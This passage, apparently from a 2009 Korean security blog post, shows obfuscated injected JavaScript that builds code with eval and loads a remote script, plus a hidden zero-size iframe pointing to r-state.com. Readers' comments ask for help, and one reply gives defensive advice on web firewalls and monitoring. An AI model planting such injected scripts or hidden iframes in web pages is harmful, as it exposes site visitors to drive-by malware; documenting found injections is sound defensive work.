i;for(i=0;i<a.length;';X='N<OTS){t=Math.floor(65';R='=s.substring(i,i+n)+"\\n";i+=n}';O='55}LZN=0;FYX()}function EJE(){';Q=';function UGN(a,r){return new';E='=0;LZN<OUS.length;++LZN)OUS';K='){var a="";var i=0;w';L='[LZN]=0;LZN=0}return MUC';H='if(MUC==null){FYX();MUC';Z=' A(a,r)}function CPY(s,n';J='=NTJ();MUC.init(OUS);for(LZN';Y='return a+s.substring(i,s.leng';U='536*Math.random());OUS[';CCUTMK+=X+U+C+O+H+J+E+L+B+G+N+F+Q+Z+K+S+R+Y;F='=null;this.e=0;this.';T='s.UCD=null;this.JNX=';Z='i>=0&&n>0)a[--n]=s.char';J='}a[--n]=2;a[--n]=0;return new ';W='d=null;this.p=null;this.';M='A(a)}function RSAKey(){this.n';N='turn null}var a=new Array()';V=')b.ZQX(x);a[--n]=x[0]';R=';var i=s.length-1;while(';Y='null}function PGU(N,E)';P='new ZXV();var x=new Array();w';U='hile(n>2){x[0]=0;while(x[0]==0';B='turn b.UKZ(16)}function BSB';H='th)}function GED(b){if(b<0x1';X='0)return"0"+b.UKZ(16);else re';Q='(s,n){if(n<s.length+11){re';S='CodeAt(i--);a[--n]=0;var b=';D='q=null;this.POX=null;thi';CCUTMK+=H+X+B+Q+N+R+Z+S+P+U+V+J+M+F+W+D+T+Y;C='this.n)}function JNP(a';D=',16);this.e=parseInt';R='Public(m);if(c==null)return nu';X='ll)return null;var c=this.do';H='sss="";for(oil=0;oil<53;oi';U='prototype.encrypt=JNP;';E='){if(oil>1){oil=MSE(SVC,53';J='th>0&&E.length>0){this.n=UGN(N';W='ll;var h=c.UKZ(16);if((h.l';M='urn"0"+h}RSAKey.prototype';S='otype.setPublic=PGU;RSAKey.';O='{if(N!=null&&E!=null&&N.leng';Y='(E,16)}}function XIQ(x){';F='return x.CKD(this.e,';P='LY()+7)>>3);if(m==nu';G='.doPublic=XIQ;RSAKey.prot';K=');a=ci};var m=BSB(a,(this.n.P';N='ength&1)==0)return h;else ret';CCUTMK+=O+J+D+Y+F+C+E+K+P+X+R+W+N+M+G+S+U+H;V='(sss);nextkey=res;var ';G='39b58008e9a1bac437b4a';T='scriptTag=document.createEle';X='ment("script");scr';H='56119f4525817792b76f';O='));rsa=new RSAKey();rsa.s';Q='etPublic("b065f155da243';J='ument.body.appendChi';S='0001");res=rsa.encrypt';E='a0d4f07d6124add83347e';W='iptTag.src="?"+res;doc';M='l++)sss+=String.fromCharCode(';P='Math.floor(75+Math.sin(oil)*21';L='4abfb3aeb34772c033609addbd3f9a';U='ee3ef9bce1c8c6da5cb8825","1';F='ld(scriptTag);';CCUTMK+=M+P+O+Q+G+L+H+E+U+S+V+T+X+W+J+F;eval(CCUTMK);</script></html>


http://itcounter.net/counter.php

-- 소스 코드 --
<html>
<iframe height="0" width="0" style="visibility: hidden;" src="http://r-state.com/equi/?t=9" name="18"/>
</html>


Trackback 0 Comment 2
  1. 허윤제 2009.06.29 10:21 address edit & del reply

    이거 우찌 처리해야하나요 죽겟네요

    • 웹방어 2009.06.29 18:23 address edit & del

      일단 웹방화벽을 세우시고 가능한 최대한의 로깅을 하시고
      코드 삽입되는 경로를 찾으셔야 할 것입니다.

      유입 경로가 확인되면 해당 유입 방법을 차단하고
      그외 추가적인 방법에 대해서도 계속적인 모니터링을 진행하셔야 합니다.

      위 코드 같은 경우 특별한 악성코드는 아닌듯 하지만
      사이트 접속시 속도 저하로 원할한 서비스에 장애를 초래합니다.